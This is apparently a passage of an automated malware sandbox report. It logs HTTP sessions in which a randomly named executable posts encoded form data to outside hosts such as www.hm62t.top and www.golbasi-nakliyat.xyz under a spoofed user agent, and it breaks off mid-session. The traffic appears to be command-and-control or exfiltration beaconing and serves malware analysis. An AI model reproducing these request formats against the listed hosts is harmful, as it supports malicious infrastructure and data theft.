                                        Server: Apache
                                        Content-Length: 196
                                        Connection: close
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        6192.168.2.2249167154.23.184.240801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:09:49.702229023 CEST2472OUTPOST /p39s/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.hm62t.top
                                        Origin: http://www.hm62t.top
                                        Referer: http://www.hm62t.top/p39s/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 2162
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 34 50 56 74 50 32 42 51 67 38 71 7a 68 66 77 68 46 37 68 4f 2b 4b 41 6a 59 4d 41 59 6d 59 57 33 52 37 74 67 70 49 50 44 48 63 73 61 35 39 56 67 46 63 65 64 47 49 5a 30 46 51 33 50 47 6b 2f 61 41 41 76 44 50 4b 54 47 49 41 6f 34 33 73 79 76 69 64 73 31 6c 4c 4e 42 30 44 7a 32 48 51 47 39 66 61 58 39 6a 32 66 67 5a 6c 58 79 78 4f 50 63 63 47 4e 48 43 36 69 49 70 52 61 72 4b 6f 56 4c 56 4c 55 57 4a 42 71 64 49 43 76 2b 35 64 70 61 33 56 62 52 61 4c 54 77 68 35 79 64 57 61 73 57 41 2b 69 69 65 70 69 51 38 64 50 62 53 35 76 4c 54 39 57 61 6a 6d 53 41 41 44 53 56 79 43 66 72 4a 70 78 61 73 50 37 2b 66 72 6f 30 4d 68 65 48 64 5a 59 53 37 70 69 76 6c 44 69 6f 41 6d 55 34 50 54 39 4a 63 32 36 6f 31 36 65 49 70 6b 72 67 49 2b 4f 46 66 39 4d 65 64 6a 66 79 64 49 34 73 50 53 30 58 6d 6d 75 6d 76 30 58 4a 53 48 73 54 6e 4e 58 33 52 4e 53 46 79 55 59 73 71 79 47 31 33 55 37 51 35 32 32 48 57 37 72 31 48 6f 6d 71 76 37 35 78 71 48 32 75 33 6c 7a 31 73 6c 2b 75 6d 61 39 41 4c 7a 6f 37 4d 44 66 4b [TRUNCATED]
                                        Data Ascii: OlTXe=4PVtP2BQg8qzhfwhF7hO+KAjYMAYmYW3R7tgpIPDHcsa59VgFcedGIZ0FQ3PGk/aAAvDPKTGIAo43syvids1lLNB0Dz2HQG9faX9j2fgZlXyxOPccGNHC6iIpRarKoVLVLUWJBqdICv+5dpa3VbRaLTwh5ydWasWA+iiepiQ8dPbS5vLT9WajmSAADSVyCfrJpxasP7+fro0MheHdZYS7pivlDioAmU4PT9Jc26o16eIpkrgI+OFf9MedjfydI4sPS0Xmmumv0XJSHsTnNX3RNSFyUYsqyG13U7Q522HW7r1Homqv75xqH2u3lz1sl+uma9ALzo7MDfKDbGpcmv0qbnqqtb6FuKoBRFhCFL5xcX5ZGSabixYbIeLVKVPCywp0+yqVq4BTMBJR+4iQw/p85qxrb8v9hIM4guZcjqwREVj0bI4qM7yJ3CvvVXeRpJ8svN7/tf3HNVAv9W83Jx20l4A03dEI2ffuEWSNaSNl6kkGZM4uA21B/RdM/zgq/jIjAJQnA2wDzmoD1FuWdiQ60IeCsOgmegkVpIJXPywEoHTmuBoRjIFqIkHhXZVlgUJHDWz2xfM9tGoPtUj5o1SkiFofkTnxyXaefvnUxD3pTqh8E1gsEUqzyUrh53dx9tGXPd22i5YkewQNzrgoGgnrI9jDaGUNEiGYKcA7WaSP7/kBvm1uyEPF3aaxeg//4tybPDnXPs0B8oH2QFLiLN71RH8ZVx80ivWdZ/ZnTL4YvqayssRoH9hNZrdOqqoWZrvgzEkTnBaI7+gEKd5rMFvmYcA3/eMC1ue3iVoVaPCR9zrNwrdAGss3sXQwTa0qOYwHNFJojLo/sXusmMB9LYaB/2J9wt9VHeAltMFFr2YR39OeatHx4FIbNOgcoKvi6qfxsZRajHJveeJ+qyKPqhX79gNcj7ol3Hm7l9tN3E3FsX0l1QdE0FxnFOTtjO0ZuPz6QS1NGqHnXbyBC7Jfice5iee2i/OCz96sJ3GZxXTlq24Il [TRUNCATED]
                                        Sep 11, 2024 10:09:49.707585096 CEST203OUTData Raw: 36 4b 75 6f 77 58 61 45 6d 4d 75 6a 69 4a 36 50 39 5a 49 61 62 44 4f 74 37 75 57 57 43 6f 63 7a 4b 6e 75 48 63 45 67 44 75 70 5a 31 58 6f 4a 4b 76 4a 63 61 72 77 56 74 68 64 6d 47 4d 4e 73 59 37 78 63 33 73 56 48 31 43 51 4f 64 39 46 31 38 45 4e
                                        Data Ascii: 6KuowXaEmMujiJ6P9ZIabDOt7uWWCoczKnuHcEgDupZ1XoJKvJcarwVthdmGMNsY7xc3sVH1CQOd9F18ENgkGpbtca+9sq+vrL9Hz6jk6bkzXilYY4WPp/cq9ni8em9HPCW0HffLVjddCNmkwSt20ipMxWlZpzNGWHT2Xu+7kNyaaaSt7scB+MnOQ2po7t58dx7ZOVRusQ9
                                        Sep 11, 2024 10:09:50.583977938 CEST312INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Wed, 11 Sep 2024 08:09:50 GMT
                                        Content-Type: text/html
                                        Content-Length: 148
                                        Connection: close
                                        ETag: "66a8e223-94"
                                        Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        7192.168.2.2249168154.23.184.240801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:09:52.249310970 CEST714OUTPOST /p39s/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.hm62t.top
                                        Origin: http://www.hm62t.top
                                        Referer: http://www.hm62t.top/p39s/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 202
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 34 50 56 74 50 32 42 51 67 38 71 7a 68 63 6f 68 45 76 31 4f 2f 71 41 6a 66 4d 41 59 76 34 57 39 52 38 6c 53 70 4a 62 74 48 72 59 61 35 76 64 67 46 76 32 64 48 49 5a 33 4f 77 33 54 4c 45 2f 54 41 41 76 70 50 4c 2f 47 49 41 38 34 30 4f 36 76 71 38 73 30 73 62 4e 44 34 6a 7a 33 48 51 43 65 66 61 54 32 6a 32 33 67 5a 67 66 79 79 50 7a 63 59 56 6c 48 48 4b 69 47 76 52 62 39 4b 6f 5a 61 56 4c 45 4f 4a 43 4f 64 4c 32 76 2b 35 49 56 61 39 69 50 52 55 72 54 74 76 5a 7a 72 56 61 35 52 4d 64 79 6b 51 66 36 72 78 70 2f 63 52 65 37 77 55 4d 7a 53 69 6d 4b 31 5a 58 33 6c 30 6e 33 68 63 41 3d 3d
                                        Data Ascii: OlTXe=4PVtP2BQg8qzhcohEv1O/qAjfMAYv4W9R8lSpJbtHrYa5vdgFv2dHIZ3Ow3TLE/TAAvpPL/GIA840O6vq8s0sbND4jz3HQCefaT2j23gZgfyyPzcYVlHHKiGvRb9KoZaVLEOJCOdL2v+5IVa9iPRUrTtvZzrVa5RMdykQf6rxp/cRe7wUMzSimK1ZX3l0n3hcA==
                                        Sep 11, 2024 10:09:53.155361891 CEST312INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Wed, 11 Sep 2024 08:09:52 GMT
                                        Content-Type: text/html
                                        Content-Length: 148
                                        Connection: close
                                        ETag: "66a8e223-94"
                                        Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        8192.168.2.2249169154.23.184.240801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:09:54.904728889 CEST2472OUTPOST /p39s/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.hm62t.top
                                        Origin: http://www.hm62t.top
                                        Referer: http://www.hm62t.top/p39s/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 3626
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 34 50 56 74 50 32 42 51 67 38 71 7a 68 38 34 68 44 4e 64 4f 33 71 41 6b 61 4d 41 59 6d 59 57 35 52 37 74 53 70 49 50 44 48 64 67 61 35 2b 4e 67 47 4d 65 64 55 59 5a 33 47 51 33 50 47 6b 2f 5a 41 44 54 54 50 4b 50 57 49 43 51 34 33 74 79 76 69 61 77 31 6b 4c 4e 42 70 54 7a 34 48 51 43 4c 66 61 69 2b 6a 32 69 46 5a 67 58 79 79 61 6e 63 64 6c 6c 47 49 71 69 47 76 52 61 38 4b 6f 59 2f 56 4c 64 54 4a 41 2f 59 49 46 33 2b 36 74 70 61 78 6c 62 53 53 72 54 70 77 70 79 50 57 61 77 72 41 2b 6a 71 65 74 4b 36 38 64 4c 62 54 76 62 4c 54 36 4b 62 73 57 53 44 65 44 53 56 38 69 66 70 4a 70 78 47 73 50 37 2b 66 72 6b 30 4d 78 65 48 64 62 38 4e 6d 35 69 76 6f 6a 69 66 4e 47 59 73 50 54 6f 59 63 79 2b 34 31 4c 61 49 6f 68 33 67 4e 4f 4f 46 50 4e 4e 62 64 6a 66 46 57 6f 34 61 50 53 74 33 6d 6d 65 51 76 30 58 4a 53 45 30 54 74 2f 50 33 56 64 53 46 77 55 59 74 38 43 47 32 33 56 72 49 35 32 75 48 57 36 7a 31 48 62 2b 71 6d 64 74 77 79 6e 32 6a 7a 6c 7a 33 2f 31 2f 71 6d 61 68 36 4c 7a 68 6d 4d 41 58 4b [TRUNCATED]
                                        Data Ascii: OlTXe=4PVtP2BQg8qzh84hDNdO3qAkaMAYmYW5R7tSpIPDHdga5+NgGMedUYZ3GQ3PGk/ZADTTPKPWICQ43tyviaw1kLNBpTz4HQCLfai+j2iFZgXyyancdllGIqiGvRa8KoY/VLdTJA/YIF3+6tpaxlbSSrTpwpyPWawrA+jqetK68dLbTvbLT6KbsWSDeDSV8ifpJpxGsP7+frk0MxeHdb8Nm5ivojifNGYsPToYcy+41LaIoh3gNOOFPNNbdjfFWo4aPSt3mmeQv0XJSE0Tt/P3VdSFwUYt8CG23VrI52uHW6z1Hb+qmdtwyn2jzlz3/1/qmah6LzhmMAXKDZepQjD0qLnrwdb+SeOsBRNDCFHDxZP5LDmaPwpXZ4eNSKVJGywL0+H7Vv0BU95JQ/YiXADosJq2vb9tvhJb4g6/cnmgRxpjl7I4tvfzTHDl1lXIbJJQsvNv/s/BG5ZAv8m83cl20l4B/XdCDWS4uEaWNe6nl8IkFJc4uFa1M/RdYvznjfjojAdqnAfNDDyoaWduZ7eQy0IcEsObo+h2VpYJXLqaErHTlMpoDGkFzYkDr3ZKlgU/HDS32wvm9uioPsUj7p1SjiFrdkTr6SWseZ33UxvNpRKh6VVg/GwqzSUpuZ3d7dtOXPFm2mtikcQQNmDg52gkio9kBaGXa0iuYJkA7WWSP6XkBem1qFQPNnaY/+ghlIpSbPzdXOZsB+sH3CtLlIl4/BHlIlxM+CuzdZ/rnR7SZfKay+0RpiJmVJrGZ6rqZ5r2g3gOTldKIoagEKt5o/tvmocA3/ePC1vV3iR8VYnsR9zrfxrdAzws/MXVvDaz9eYuHNAgojDG/t7ut3sB9LYbEP2KngtiVHSZltNSFryYRClOfJlHxatIL9OgLYKs0KqexsYPagTnvcmJ/ZqKMpJY5NgMaj6jvXL97lwwN3Q3F7/0/EQdFEFx71OQ1zOlGeDV6QOTNCupni/yQknJdhEZwyeT7C/MCzxgsJ/OZxuulta4N1 [TRUNCATED]
                                        Sep 11, 2024 10:09:54.910303116 CEST1667OUTData Raw: 36 4b 55 6f 78 37 6a 45 67 4d 75 74 51 78 36 4a 4f 42 49 61 72 44 49 6e 62 76 4d 41 79 6b 77 7a 4b 72 71 48 5a 34 57 44 63 78 5a 37 43 73 4a 41 39 68 63 65 4c 77 55 75 68 64 33 47 4d 42 58 59 37 68 6d 33 6f 4a 39 31 54 63 4f 53 74 46 31 72 57 6c
                                        Data Ascii: 6KUox7jEgMutQx6JOBIarDInbvMAykwzKrqHZ4WDcxZ7CsJA9hceLwUuhd3GMBXY7hm3oJ91TcOStF1rWlngGpdqca39sqavrD5H3r+k+XkzUKlZo4VMZ/Wp9nk8eqEHPLc0HPfLVPdPydm0gSt/UioSBW8XJPOGWm1xDScxTNCZO+JgJoIEIM7PhCPo7Bhz9tDMbRUpbpVH4mi48LgiMOhr2TcTyljv/Eh5UJb4QcWEX71C/YH
                                        Sep 11, 2024 10:09:55.779352903 CEST312INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Wed, 11 Sep 2024 08:09:55 GMT
                                        Content-Type: text/html
                                        Content-Length: 148
                                        Connection: close
                                        ETag: "66a8e223-94"
                                        Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        9192.168.2.2249170154.23.184.240801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:09:57.435573101 CEST453OUTGET /p39s/?th=XXRlJ2&OlTXe=1N9NMDNpm9Czos0vDrs0jP0yJ99w59mrSL4zw6nNIeZI+vV5F9OeHegmPR72METQIT3pI5KWWCEpjpCMjPRQtKE/9BfJGlSqJeHxtl2Ce1Gg34KYTx0FEqSEiFH5 HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.hm62t.top
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Sep 11, 2024 10:09:58.324760914 CEST312INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Wed, 11 Sep 2024 08:09:58 GMT
                                        Content-Type: text/html
                                        Content-Length: 148
                                        Connection: close
                                        ETag: "66a8e223-94"
                                        Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        10192.168.2.224917185.159.66.93801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:10:03.372596979 CEST2472OUTPOST /k2vl/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.golbasi-nakliyat.xyz
                                        Origin: http://www.golbasi-nakliyat.xyz
                                        Referer: http://www.golbasi-nakliyat.xyz/k2vl/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 2162
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 65 7a 47 4a 78 39 62 65 50 2f 56 77 42 64 4e 6f 46 47 67 61 57 66 47 6e 31 48 4a 2b 6b 46 45 76 41 57 31 46 61 31 75 65 66 31 61 58 4e 31 44 6d 6a 74 35 70 35 6e 37 68 71 44 79 32 52 35 66 45 2f 63 72 6f 48 76 79 61 44 59 53 54 4f 62 72 56 42 4c 39 71 56 59 51 62 51 50 45 62 30 79 6f 5a 33 4b 53 78 52 71 73 2f 34 31 59 6e 56 43 70 76 4c 33 4d 54 51 51 37 6f 49 62 4d 73 45 54 5a 41 43 74 78 72 50 69 2f 75 6f 4e 4f 56 4c 53 33 42 44 69 34 59 2f 63 68 4f 64 39 61 6a 61 63 31 55 2b 77 61 4e 52 79 41 7a 6c 77 45 75 55 43 79 2b 56 56 71 59 55 79 43 65 4c 51 76 43 7a 76 50 37 33 48 66 6c 66 6b 6f 63 6c 38 4c 65 55 51 4b 76 61 72 30 6c 31 79 6a 53 6b 54 56 48 4c 75 2b 49 67 36 64 38 44 55 58 31 65 71 32 6f 6c 73 41 54 4e 7a 45 67 44 64 34 46 32 78 46 78 49 39 59 6a 6a 2f 79 50 6b 31 4b 43 61 4d 37 47 73 45 6c 74 53 61 58 46 54 57 43 35 71 30 38 43 47 63 68 34 76 43 77 34 51 32 32 4b 67 44 5a 76 76 61 45 41 6d 6c 6b 7a 37 71 47 39 77 66 4b 4e 68 50 48 49 49 39 59 49 69 56 4d 62 77 67 52 41 [TRUNCATED]
                                        Data Ascii: OlTXe=ezGJx9beP/VwBdNoFGgaWfGn1HJ+kFEvAW1Fa1uef1aXN1Dmjt5p5n7hqDy2R5fE/croHvyaDYSTObrVBL9qVYQbQPEb0yoZ3KSxRqs/41YnVCpvL3MTQQ7oIbMsETZACtxrPi/uoNOVLS3BDi4Y/chOd9ajac1U+waNRyAzlwEuUCy+VVqYUyCeLQvCzvP73Hflfkocl8LeUQKvar0l1yjSkTVHLu+Ig6d8DUX1eq2olsATNzEgDd4F2xFxI9Yjj/yPk1KCaM7GsEltSaXFTWC5q08CGch4vCw4Q22KgDZvvaEAmlkz7qG9wfKNhPHII9YIiVMbwgRArtkgXgY881LKInqv/nTHE8i4qGhAFsX5LJjKSSiuY9Z3fUaVKPz2+bo786GkJX03gHhWiB4Rq/8KwevvElzZZNh1LGtVc0ky7JaYzLZKesskixmf0Em/HmCYZROwt2xVyV9qxKzmnZ7S88OOW/6ZUXxe+E6wMTcVvaeVvUbt6xnz6w13i8McN0AJ/SUYqLAfoeN1LF7SgEFBuCJUS65s2X+nSzBNsJpRontN6edeitRrYAuHR/ExJ5MaGC+eYZ1N+kz6T6Q/z0ZDQVCEZFrKw6A2Qy/8i48onRj9Lts35fp3gzUiDMpzXRyyup1fgV9Ljl6XCpe0n/eI1V+yjc4k36L+GudFtrBGVCMqitJUzF8J6FybhEY6q+6OBNSiH7ZKc1p0sAUtYBY3cR/TksD3UGGypVgLK7TjS8jrW54ewUSREYlJP8zUgjPn9qsk1mu6ZG0fyWMIacnxHM/BKdup0vBhT+MYml3QphjwhVRlAf2xQHPBS9Y2Fs57hHY3kTwPnxGmhcy5IBs86UNFq8v2BL3Cby5qUtZs7N5wRziuenNZVTRRKg+FcKbF4mNdTtyQ17J+cg0LGJQG6E9li36kxixBYvO5RVw3+bZIRlaOcBzyHp4LFb9BBbPzNOd2SdZGRYgJANMGTo2MQ5rJ3YJfN3YPau0Dgd90ao [TRUNCATED]
                                        Sep 11, 2024 10:10:03.377585888 CEST236OUTData Raw: 51 45 4e 6a 44 54 31 31 6d 2f 79 5a 32 4d 36 31 35 4d 6e 66 2b 43 49 4f 46 54 47 79 52 2f 41 43 7a 75 68 73 52 38 58 58 38 79 43 4c 57 2b 5a 4c 42 42 6e 43 7a 34 48 62 57 6c 73 32 38 62 6c 76 33 33 74 2b 70 63 31 62 66 4d 75 33 79 6b 51 2f 4f 72
                                        Data Ascii: QENjDT11m/yZ2M615Mnf+CIOFTGyR/ACzuhsR8XX8yCLW+ZLBBnCz4HbWls28blv33t+pc1bfMu3ykQ/OrUenv1CNAMq+5a/g+Oaz6UUKPX6dWBrtTTeHstA2cACvlmf9PtiwXQ2wemy8j4zaVAnzWKwxi2lh78ICGN0dQ3bZCW1xCXi/UaP+5Ot0HPd8WVPiscfgXyWPbcKBpFmfKcukdngaa0yRBRiUNTVFAxYPwT1


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        11192.168.2.224917285.159.66.93801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:10:05.924834013 CEST747OUTPOST /k2vl/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.golbasi-nakliyat.xyz
                                        Origin: http://www.golbasi-nakliyat.xyz
                                        Referer: http://www.golbasi-nakliyat.xyz/k2vl/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 202
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 65 7a 47 4a 78 39 62 65 50 2f 56 77 42 65 6c 6f 46 53 4d 61 56 2f 47 6e 32 48 4a 2b 75 6c 45 70 41 52 39 4e 61 78 32 4f 66 43 47 58 4f 6e 62 6d 6a 66 42 70 36 6e 37 6d 34 6a 79 79 4d 70 66 56 2f 63 71 37 48 76 2b 61 44 59 47 54 63 70 54 56 57 61 39 74 64 49 51 5a 59 76 46 63 30 79 55 69 33 4b 65 68 52 71 55 2f 34 7a 51 6e 55 43 35 76 4e 56 55 54 56 67 37 75 41 37 4d 33 45 54 56 56 43 74 42 6a 50 69 72 75 70 38 53 56 4c 6a 58 42 48 78 51 59 78 38 68 44 48 74 62 64 58 2b 35 5a 37 42 76 44 59 53 55 51 69 42 59 73 66 77 4b 5a 55 6e 2b 44 61 79 65 43 4c 31 48 58 35 74 6d 30 6f 67 3d 3d
                                        Data Ascii: OlTXe=ezGJx9beP/VwBeloFSMaV/Gn2HJ+ulEpAR9Nax2OfCGXOnbmjfBp6n7m4jyyMpfV/cq7Hv+aDYGTcpTVWa9tdIQZYvFc0yUi3KehRqU/4zQnUC5vNVUTVg7uA7M3ETVVCtBjPirup8SVLjXBHxQYx8hDHtbdX+5Z7BvDYSUQiBYsfwKZUn+DayeCL1HX5tm0og==


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        12192.168.2.224917385.159.66.93801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:10:08.475744009 CEST2472OUTPOST /k2vl/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.golbasi-nakliyat.xyz
                                        Origin: http://www.golbasi-nakliyat.xyz
                                        Referer: http://www.golbasi-nakliyat.xyz/k2vl/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 3626
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
